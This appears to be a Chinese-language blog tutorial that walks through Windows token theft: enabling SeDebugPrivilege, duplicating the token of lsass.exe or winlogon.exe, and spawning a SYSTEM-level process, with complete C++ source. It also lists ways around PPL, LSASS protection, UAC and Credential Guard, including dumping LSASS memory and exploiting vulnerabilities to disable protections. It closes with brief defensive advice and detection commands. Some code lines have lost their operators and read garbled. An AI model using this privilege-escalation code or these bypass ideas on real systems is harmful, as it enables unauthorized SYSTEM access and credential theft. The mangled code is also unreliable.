Windows 进程令牌窃取实战:从 lsass.exe 获取 System 权限运行记事本(附 C++ 源码) Windows 系统权限提升技术深度解析从进程令牌操作到安全防御实践在Windows系统安全领域权限管理始终是攻防对抗的核心战场。掌握系统级权限不仅意味着对操作系统的完全控制更是安全研究人员进行漏洞分析、渗透测试的必备技能。本文将深入探讨Windows环境下通过进程令牌操作实现权限提升的技术细节提供可落地的C实现方案并分析现代系统对此类技术的防御机制。1. Windows权限体系基础与提权原理Windows操作系统采用基于令牌(Token)的权限管理体系每个进程运行时都关联一个安全令牌决定了该进程能够访问哪些系统资源。系统关键进程如lsass.exe本地安全认证子系统服务通常以SYSTEM权限运行——这是Windows中最高级别的权限甚至超过管理员账户。令牌窃取提权的核心逻辑在于获取高权限进程句柄复制其安全令牌利用复制的令牌创建新进程这种技术之所以有效是因为Windows允许具有足够权限的进程访问其他进程的令牌信息。关键在于获取SeDebugPrivilege特权该特权默认授予管理员用户允许调试其他用户空间的进程。// 获取SeDebugPrivilege的典型代码片段 HANDLE hToken; LUID luid; TOKEN_PRIVILEGES tp; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, hToken); LookupPrivilegeValue(NULL, SE_DEBUG_NAME, luid); tp.PrivilegeCount 1; tp.Privileges[0].Luid luid; tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL);2. 实战通过LSASS进程令牌获取SYSTEM权限2.1 目标进程选择与枚举并非所有系统进程都适合作为令牌来源。理想的候选进程应满足始终以SYSTEM权限运行允许PROCESS_QUERY_INFORMATION访问系统关键性较低避免导致系统不稳定通过进程快照API枚举符合条件的进程DWORD FindSystemProcess() { PROCESSENTRY32 pe; pe.dwSize sizeof(PROCESSENTRY32); HANDLE hSnapshot CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(Process32First(hSnapshot, pe)) { do { if(_wcsicmp(pe.szExeFile, Llsass.exe) 0 || _wcsicmp(pe.szExeFile, Lwinlogon.exe) 0) { CloseHandle(hSnapshot); return pe.th32ProcessID; } } while(Process32Next(hSnapshot, pe)); } CloseHandle(hSnapshot); return 0; }2.2 令牌复制与进程创建关键技术成功获取目标进程句柄后关键步骤包括令牌复制使用DuplicateTokenEx复制主令牌进程创建CreateProcessWithTokenW允许指定令牌创建进程HANDLE hProcess OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); HANDLE hToken; OpenProcessToken(hProcess, TOKEN_DUPLICATE, hToken); HANDLE hNewToken; DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, hNewToken); STARTUPINFOW si {0}; PROCESS_INFORMATION pi {0}; si.cb sizeof(STARTUPINFOW); si.lpDesktop Lwinsta0\\default; // 指定窗口站 CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, Lnotepad.exe, 0, NULL, NULL, si, pi);注意CreateProcessAsUser需要额外的特权而CreateProcessWithTokenW在获取令牌后可直接使用这是实际开发中的重要区别。3. 完整实现代码与关键参数解析以下是完整的提权实现代码包含详细的错误处理和参数说明#include windows.h #include tlhelp32.h #include stdio.h BOOL EnableDebugPrivilege() { HANDLE hToken; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, hToken)) return FALSE; LUID luid; if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, luid)) { CloseHandle(hToken); return FALSE; } TOKEN_PRIVILEGES tp; tp.PrivilegeCount 1; tp.Privileges[0].Luid luid; tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL)) { CloseHandle(hToken); return FALSE; } CloseHandle(hToken); return TRUE; } DWORD FindSystemProcess() { PROCESSENTRY32 pe; pe.dwSize sizeof(PROCESSENTRY32); HANDLE hSnapshot CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(!Process32First(hSnapshot, pe)) { CloseHandle(hSnapshot); return 0; } do { if(_wcsicmp(pe.szExeFile, Llsass.exe) 0 || _wcsicmp(pe.szExeFile, Lwinlogon.exe) 0) { CloseHandle(hSnapshot); return pe.th32ProcessID; } } while(Process32Next(hSnapshot, pe)); CloseHandle(hSnapshot); return 0; } int main() { if(!EnableDebugPrivilege()) { printf([!] Failed to enable SeDebugPrivilege\n); return 1; } DWORD pid FindSystemProcess(); if(pid 0) { printf([!] Could not find suitable system process\n); return 1; } HANDLE hProcess OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if(!hProcess) { printf([!] OpenProcess failed (%d)\n, GetLastError()); return 1; } HANDLE hToken; if(!OpenProcessToken(hProcess, TOKEN_DUPLICATE, hToken)) { printf([!] OpenProcessToken failed (%d)\n, GetLastError()); CloseHandle(hProcess); return 1; } HANDLE hNewToken; if(!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, hNewToken)) { printf([!] DuplicateTokenEx failed (%d)\n, GetLastError()); CloseHandle(hToken); CloseHandle(hProcess); return 1; } STARTUPINFOW si {0}; PROCESS_INFORMATION pi {0}; si.cb sizeof(STARTUPINFOW); si.lpDesktop Lwinsta0\\default; if(!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, Lnotepad.exe, 0, NULL, NULL, si, pi)) { printf([!] CreateProcessWithTokenW failed (%d)\n, GetLastError()); } else { printf([] Successfully created process with SYSTEM token\n); } CloseHandle(hNewToken); CloseHandle(hToken); CloseHandle(hProcess); return 0; }4. 现代系统防御机制与绕过思路随着Windows安全机制的不断强化传统的令牌窃取技术面临多重防护防御机制原理潜在绕过方法PPL(Protected Process Light)限制对关键进程的访问利用未受保护的进程或驱动漏洞LSASS保护防止内存读取和进程注入使用合法的API调用获取令牌UAC(User Account Control)限制管理员权限滥用通过COM提升或自动提升白名单Credential Guard隔离凭据存储寻找非Credential Guard保护的令牌源实际测试中发现Windows 10 1809及更高版本默认启用LSASS保护直接打开lsass.exe进程会失败。此时可考虑以下替代方案使用MiniDumpWriteDump生成转储文件后离线提取令牌信息寻找其他未受PPL保护的系统进程如某些服务进程利用已知漏洞暂时禁用保护机制5. 安全开发实践与防御建议对于防御方建议采取以下措施防范令牌窃取攻击最小权限原则服务账户仅授予必要权限启用PPL保护关键系统进程令牌过滤通过组策略限制令牌权限监控敏感API调用如DuplicateTokenEx、CreateProcessWithTokenW等对于安全研究人员在合法授权测试时应注意# 防御性检测命令示例 Get-Process -IncludeUserName | Where-Object { $_.ProcessName -in (lsass,winlogon) -and $_.UserName -notlike *SYSTEM* } # 启用LSASS保护 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f令牌操作技术在系统管理、安全测试等场景具有实际价值。我曾在一个企业环境中使用类似技术帮助恢复被恶意软件破坏的系统服务关键在于理解原理后的创造性应用。